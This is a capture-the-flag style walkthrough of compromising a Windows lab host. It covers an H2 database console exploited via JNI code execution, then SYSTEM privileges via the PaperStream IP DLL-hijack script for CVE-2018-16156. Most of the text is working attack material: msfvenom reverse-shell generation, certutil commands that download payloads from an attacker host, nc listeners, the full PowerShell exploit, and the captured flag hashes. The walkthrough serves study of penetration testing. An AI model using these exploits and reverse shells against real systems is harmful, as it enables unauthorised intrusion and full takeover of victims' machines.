TCP Ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 14:27 +08
Nmap scan report for 192.168.105.66
Host is up (0.039s latency).
Not shown: 46501 closed tcp ports (conn-refused), 19020 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
7680/tcp open pando-pub
8082/tcp open blackice-alerts
9092/tcp open XmlIpcRegSvc
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds
TCP Service Scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 14:27 +08
Nmap scan report for 192.168.105.66
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: H2 Database Engine (redirect)
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open pando-pub?
8082/tcp open http H2 database http console
|_http-title: H2 Console
9092/tcp open XmlIpcRegSvc?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9092-TCP:V=7.94SVN%I=7%D=11/26%Time=67456A52%P=x86_64-pc-linux-gnu%
SF:r(NULL,516,"\0\0\0\0\0\0\0\x05\x009\x000\x001\x001\x007\0\0\0F\0R\0e\0m
SF:\0o\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\0t\0o\0\x20\0t\0
SF:h\0i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n\0o\0t\0\x20\0a\
SF:0l\0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0A\0l\0l\0o\0w\0O
SF:\0t\0h\0e\0r\0s\xff\xff\xff\xff\0\x01`\x05\0\0\x024\0o\0r\0g\0\.\0h\x00
SF:2\0\.\0j\0d\0b\0c\0\.\0J\0d\0b\0c\0S\0Q\0L\0N\0o\0n\0T\0r\0a\0n\0s\0i\0
SF:e\0n\0t\0C\0o\0n\0n\0e\0c\0t\0i\0o\0n\0E\0x\0c\0e\0p\0t\0i\0o\0n\0:\0\x
SF:20\0R\0e\0m\0o\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\0t\0o
SF:\0\x20\0t\0h\0i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n\0o\0
SF:t\0\x20\0a\0l\0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0A\0l\
SF:0l\0o\0w\0O\0t\0h\0e\0r\0s\0\x20\0\[\x009\x000\x001\x001\x007\0-\x001\x
SF:009\x009\0\]\0\r\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\
SF:0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0J\0d\0b\
SF:0c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\(\0D\0b\0E\0x\0c\0e\0p\0t\0i\0
SF:o\0n\0\.\0j\0a\0v\0a\0:\x006\x001\x007\0\)\0\r\0\n\0\t\0a\0t\0\x20\0o\0
SF:r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0
SF:i\0o\0n\0\.\0g\0e\0t\0J\0d\0b\0c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\
SF:(\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x004\x002\x007\0\
SF:)\0\r\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e
SF:\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0\(\0D\0b\0E\0x\0c\0
SF:e\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x002\x000\x005\0\)\0\r\0\n\0\t\0a\0
SF:t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0D\0b")%r(inf
SF:ormix,516,"\0\0\0\0\0\0\0\x05\x009\x000\x001\x001\x007\0\0\0F\0R\0e\0m\
SF:0o\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\0t\0o\0\x20\0t\0h
SF:\0i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n\0o\0t\0\x20\0a\0
SF:l\0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0A\0l\0l\0o\0w\0O\
SF:0t\0h\0e\0r\0s\xff\xff\xff\xff\0\x01`\x05\0\0\x024\0o\0r\0g\0\.\0h\x002
SF:\0\.\0j\0d\0b\0c\0\.\0J\0d\0b\0c\0S\0Q\0L\0N\0o\0n\0T\0r\0a\0n\0s\0i\0e
SF:\0n\0t\0C\0o\0n\0n\0e\0c\0t\0i\0o\0n\0E\0x\0c\0e\0p\0t\0i\0o\0n\0:\0\x2
SF:0\0R\0e\0m\0o\0t\0e\0\x20\0c\0o\0n\0n\0e\0c\0t\0i\0o\0n\0s\0\x20\0t\0o\
SF:0\x20\0t\0h\0i\0s\0\x20\0s\0e\0r\0v\0e\0r\0\x20\0a\0r\0e\0\x20\0n\0o\0t
SF:\0\x20\0a\0l\0l\0o\0w\0e\0d\0,\0\x20\0s\0e\0e\0\x20\0-\0t\0c\0p\0A\0l\0
SF:l\0o\0w\0O\0t\0h\0e\0r\0s\0\x20\0\[\x009\x000\x001\x001\x007\0-\x001\x0
SF:09\x009\0\]\0\r\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0
SF:s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0J\0d\0b\0
SF:c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\(\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o
SF:\0n\0\.\0j\0a\0v\0a\0:\x006\x001\x007\0\)\0\r\0\n\0\t\0a\0t\0\x20\0o\0r
SF:\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i
SF:\0o\0n\0\.\0g\0e\0t\0J\0d\0b\0c\0S\0Q\0L\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\(
SF:\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x004\x002\x007\0\)
SF:\0\r\0\n\0\t\0a\0t\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\
SF:0\.\0D\0b\0E\0x\0c\0e\0p\0t\0i\0o\0n\0\.\0g\0e\0t\0\(\0D\0b\0E\0x\0c\0e
SF:\0p\0t\0i\0o\0n\0\.\0j\0a\0v\0a\0:\x002\x000\x005\0\)\0\r\0\n\0\t\0a\0t
SF:\0\x20\0o\0r\0g\0\.\0h\x002\0\.\0m\0e\0s\0s\0a\0g\0e\0\.\0D\0b");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-26T06:30:11
|_ start_date: N/A
|_clock-skew: -1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.56 seconds
Plenty of ports here, but from a brief look on the Nmap service scan, we don’t see much except from the HTTP services on ports 80 and 8082.
Port 80
A quick look at port 80; looks like a guide for the H2 Database Engine and nothing else.
http://192.168.105.66/html/main.html
Port 8082
Port 8082 gives us the H2 Database software itself and navigating to http://192.168.105.66:8082/ immediately redirects us and gives us a session ID.
http://192.168.105.66:8082/login.jsp?jsessionid=34d0c452e1daa553f4b6dcac2dabc08d
H2 Console
Without touching anything else, when clicking connect, we ’login’ to the console.
It states the version on the left sidebar: 1.4.199
There are a few results for H2 Database on searchsploit and we always want to try the RCE first, however, the RCE is for an older version.
So, we try the JNI Code Execution since it looks promising as well.
Exploit
https://www.exploit-db.com/exploits/49384
Snippet of the payloads:
Without modifying the payloads, after executing them one by one in sequence, we get the output of whoami.
We find a user tony on machine jacko.
Reverse Shell
Let’s craft a reverse shell and then upload it to tony’s directory on the target machine.
Generate shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.169 LPORT=445 -f exe -o reverse.exe
Inject this command into the web console by replacing the whoami command from the exploit:
certutil -urlcache -split -f http://192.168.45.169/reverse.exe C:\\Users\\tony\\reverse.exe
Then we start our nc listener and then execute the reverse shell with the command below:
C:\\Users\\tony\\reverse.exe
Full payload:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:\\Users\\tony\\reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Shell as tony
sudo wrapnc 445
[sudo] password for hans:
listening on [any] 445 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.105.66] 50266
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\H2\service>
Set Path
I couldn’t execute typical basic commands and was wondering why.
C:\Program Files (x86)\H2\service>whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>dir
Volume in drive C has no label.
Volume Serial Number is AC2F-6399
Directory of C:\Program Files (x86)\H2\service
04/27/2020 08:00 PM <DIR> .
04/27/2020 08:00 PM <DIR> ..
02/28/2017 05:07 AM 1,659 0_run_server_debug.bat
02/28/2017 05:07 AM 1,501 1_install_service.bat
02/28/2017 05:07 AM 66 2_start_service.bat
02/28/2017 05:07 AM 29 3_start_browser.bat
02/28/2017 05:07 AM 27 4_stop_service.bat
02/28/2017 05:07 AM 1,294 5_uninstall_service.bat
03/18/2018 11:34 AM 2,615 serviceWrapperLicense.txt
04/27/2020 01:05 PM 3,737 wrapper.conf
02/28/2017 05:07 AM 81,920 wrapper.dll
02/28/2017 05:07 AM 204,800 wrapper.exe
02/28/2017 05:07 AM 83,820 wrapper.jar
04/27/2020 08:18 PM 4,573 wrapper.log
12 File(s) 386,041 bytes
2 Dir(s) 7,205,875,712 bytes free
C:\Program Files (x86)\H2\service>hostname
'hostname' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>hostname.exe
'hostname.exe' is not recognized as an internal or external command,
operable program or batch file.
C:\Program Files (x86)\H2\service>set
...<truncated>...
Path=C:\Users\tony\AppData\Local\Microsoft\WindowsApps;
...<truncated>...
It seems that the path variable only contains this one path. To fix this, we need to set the PATH variable.
set PATH=%PATH%C:\Windows\System32;
Now I can run the commands as usual.
C:\Program Files (x86)\H2\service>set PATH=%PATH%;C:\Windows\System32
C:\Program Files (x86)\H2\service>whoami
jacko\tony
C:\Program Files (x86)\H2\service>hostname
jacko
local.txt
C:\Program Files (x86)\H2\service>cd c:\users\tony\desktop
c:\Users\tony\Desktop>type local.txt
47b489c923c280c755bfd4a14fee933e
Privilege Tokens
c:\Users\tony\Desktop>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeImpersonatePrivilege token is enabled and I tried exploiting with GodPotato but it doesn’t seem to work.
Looking at the Program Files directory, I see an interesting program called PaperStream IP.
C:\Users\tony>cd C:\program files (x86)
C:\Program Files (x86)>dir
Volume in drive C has no label.
Volume Serial Number is AC2F-6399
Directory of C:\Program Files (x86)
04/27/2020 08:01 PM <DIR> .
04/27/2020 08:01 PM <DIR> ..
04/27/2020 07:59 PM <DIR> Common Files
04/27/2020 08:01 PM <DIR> fiScanner
04/27/2020 07:59 PM <DIR> H2
05/03/2022 05:22 PM <DIR> Internet Explorer
03/18/2019 08:52 PM <DIR> Microsoft.NET
04/27/2020 08:01 PM <DIR> PaperStream IP
03/18/2019 10:20 PM <DIR> Windows Defender
03/18/2019 08:52 PM <DIR> Windows Mail
04/24/2020 08:50 AM <DIR> Windows Media Player
03/18/2019 10:23 PM <DIR> Windows Multimedia Platform
03/18/2019 09:02 PM <DIR> Windows NT
03/18/2019 10:23 PM <DIR> Windows Photo Viewer
03/18/2019 10:23 PM <DIR> Windows Portable Devices
03/18/2019 08:52 PM <DIR> WindowsPowerShell
0 File(s) 0 bytes
16 Dir(s) 7,205,625,856 bytes free
searchsploit gave me a PE exploit as a powershell script.
Exploit
PowerShell Script
# Exploit Title: PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation
# Exploit Author: 1F98D
# Original Author: securifera
# Date: 12 May 2020
# Vendor Hompage: https://www.fujitsu.com/global/support/products/computing/peripheral/scanners/fi/software/fi6x30-fi6x40-ps-ip-twain32.html
# CVE: CVE-2018-16156
# Tested on: Windows 10 x64
# References:
# https://www.securifera.com/advisories/cve-2018-16156/
# https://github.com/securifera/CVE-2018-16156-Exploit
# A DLL hijack vulnerability exists in the FJTWSVIC service running as part of
# the Fujitsu PaperStream IP (TWAIN) software package. This exploit searches
# for a writable location, copies the specified DLL to that location and then
# triggers the DLL load by sending a message to FJTWSVIC over the FjtwMkic_Fjicube_32
# named pipe.
$ErrorActionPreference = "Stop"
# Example payload generated as follows
# msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=tun0 LPORT=4444
$PayloadFile = "C:\Users\tony\shell.dll"
if ((Test-Path $PayloadFile) -eq $false) {
Write-Host "$PayloadFile not found, did you forget to upload it?"
Exit 1
}
# Find Writable Location
$WritableDirectory = $null
$Path = (Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment" -Name "PATH").path
$Path -Split ";" | % {
try {
[IO.File]::OpenWrite("$_\x.txt").close()
Remove-Item "$_\x.txt"
$WritableDirectory = $_
} catch {}
}
if ($WritableDirectory -eq $null) {
Write-Host "No writable directories in PATH, FJTWSVIC is not exploitable"
Exit 1
}
Write-Host "Writable location found, copying payload to $WritableDirectory"
Copy-Item "$PayloadFile" "$WritableDirectory\UninOldIS.dll"
Write-Host "Payload copied, triggering..."
$client = New-Object System.IO.Pipes.NamedPipeClientStream(".", "FjtwMkic_Fjicube_32", [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None, [System.Security.Principal.TokenImpersonationLevel]::Impersonation)
$reader = $null
$writer = $null
try {
$client.Connect()
$reader = New-Object System.IO.StreamReader($client)
$writer = New-Object System.IO.StreamWriter($client)
$writer.AutoFlush = $true
$writer.Write("ChangeUninstallString")
$reader.ReadLine()
} finally {
$client.Dispose()
}
Write-Host "Payload triggered"
This script exploits a DLL hijack vulnerability, hence, we will need to generate a DLL payload.
Check PowerShell
Before running the exploit, let’s see if we can run PowerShell.
C:\Program Files (x86)>powershell
'powershell' is not recognized as an internal or external command,
operable program or batch file.
Nope, so let’s locate PowerShell.
C:\Windows\System32>dir /s *powershell.exe
Volume in drive C has no label.
Volume Serial Number is AC2F-6399
Directory of C:\Windows\System32\WindowsPowerShell\v1.0
03/18/2019 08:46 PM 451,584 powershell.exe
1 File(s) 451,584 bytes
Total Files Listed:
1 File(s) 451,584 bytes
0 Dir(s) 7,205,421,056 bytes free
And then add that to the Path variable.
C:\Windows\System32>set Path=%Path%C:\Windows\System32\WindowsPowerShell\v1.0;
C:\Windows\System32>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\System32>
Now we can run PowerShell.
Generate DLL Payload
Now, we can proceed to generate the shell.dll as mentioned by the exploit.
msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=tun0 LPORT=4444
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
NOTE: the example msfvenom command in the exploit generates a dll in x64 but remember that the vulnerable application in the target is x86 (it’s under Program Files (x86) folder) so use the non-x64 version
Now, we go to tony’s directory and upload the shell.dll and powershell script.
PS C:\Windows\System32> cd C:/users/tony
PS C:\users\tony> certutil -urlcache -f http://192.168.45.169/shell.dll shell.dll
**** Online ****
CertUtil: -URLCache command completed successfully.
PS C:\users\tony> certutil -urlcache -f http://192.168.45.169/exploit.ps1 exploit.ps1
**** Online ****
CertUtil: -URLCache command completed successfully.
Escalate
Finally, we simply execute the PowerShell script.
PS C:\users\tony> ./exploit.ps1
Writable location found, copying payload to C:\JavaTemp\
Payload copied, triggering...
Our nc listener then catches a system shell.
wrapnc 4444
listening on [any] 4444 ...
connect to [192.168.45.169] from (UNKNOWN) [192.168.105.66] 50304
Microsoft Windows [Version 10.0.18363.836]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type proof.txt
2463fc71aee4d819fdd72877c3f838ad